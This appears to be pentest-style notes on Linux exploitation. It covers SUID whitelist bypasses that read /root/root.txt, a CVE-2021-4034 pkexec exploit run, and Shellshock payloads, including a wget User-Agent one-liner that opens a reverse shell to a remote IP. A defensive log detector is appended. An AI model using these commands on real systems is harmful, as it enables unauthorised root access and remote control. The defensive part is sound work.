Binary Exploitation - Linux

Bypass SUID whitelist
  • Sometimes a SUID binary only allows a whitelist of commands.

  • This can be bypassed by using subcommands:

supershell '/bin/ls $(cat /root/root.txt)
  • In this example, supershell is the SUID binary and /bin/ls is the whitelisted command. There is also another way to bypass this, by using ' to open a quote:

supershell '/bin/ls
  • Then in the next line use your desired command:

cat /root/root.txt'
Exploit pkexec
  • Check if pkexec has SUID permissions:

ls -l /usr/bin/pkexec
python CVE-2021-4034.py
Shellshock
  • Attack vectors include remote command execution via CGI scripts or web servers, as well as exploitation in environments like SSH, HTTP, and any process in which Bash interprets environment variables.

  • Affects Bash versions 1.x to 4.3. The payload is an empty function definition followed by the command to run:

() { :;}; echo; /usr/bin/id
  • Inject malicious code through the User-Agent header, targeting a vulnerable CGI script in the /cgi-bin/ directory to initiate a reverse shell:

wget -U '() { :;}; echo; /bin/bash >& /dev/tcp/172.24.0.253/4443 0>&1' -O- http://172.24.0.2/cgi-bin/stats
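Added example, not part of the original notes: a defender-side detector for the Shellshock pattern above, run over constructed Apache combined-format log lines (IPs, timestamps and paths are made up; line 2 carries the page's probe in the User-Agent, line 3 a variant in the Referer).

```python
import re
from typing import Dict, List

# Constructed sample lines in Apache "combined" log format (not real traffic).
# Lines 1 and 4 are benign but contain parentheses and braces; they must not match.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) {build}"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "() { :;}; echo; /usr/bin/id"
10.0.0.9 - - [10/Mar/2024:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "() {:;}; /bin/echo probe" "curl/8.0"
10.0.0.7 - - [10/Mar/2024:12:00:04 +0000] "POST /cgi-bin/stats HTTP/1.1" 403 0 "http://example.test/(a) {b}" "Wget/1.21"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock signature: the exported-function prefix "() {" (whitespace between
# the tokens is optional), as in the payload `() { :;}; <command>` above.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_combined(line: str) -> Dict[str, str]:
    """Split one combined-format line into named fields; raise on garbage."""
    m = COMBINED_RE.match(line)
    if m is None:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()


def find_shellshock(log_text: str) -> List[Dict[str, object]]:
    """One finding per log line whose Referer or User-Agent carries the
    Shellshock prefix, noting whether a CGI path was the target."""
    findings: List[Dict[str, object]] = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_combined(raw)
        parts = rec["req"].split(" ")
        path = parts[1] if len(parts) >= 2 else ""
        for field, header in (("referer", "Referer"), ("ua", "User-Agent")):
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "path": path,
                    "header": header, "value": rec[field],
                    "cgi_target": path.startswith("/cgi-bin/"),
                })
    return findings
```

Mod_security or a SIEM rule on the same `\(\)\s*\{` pattern over request headers catches the attempt before Bash ever sees it; patching Bash removes the root cause.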
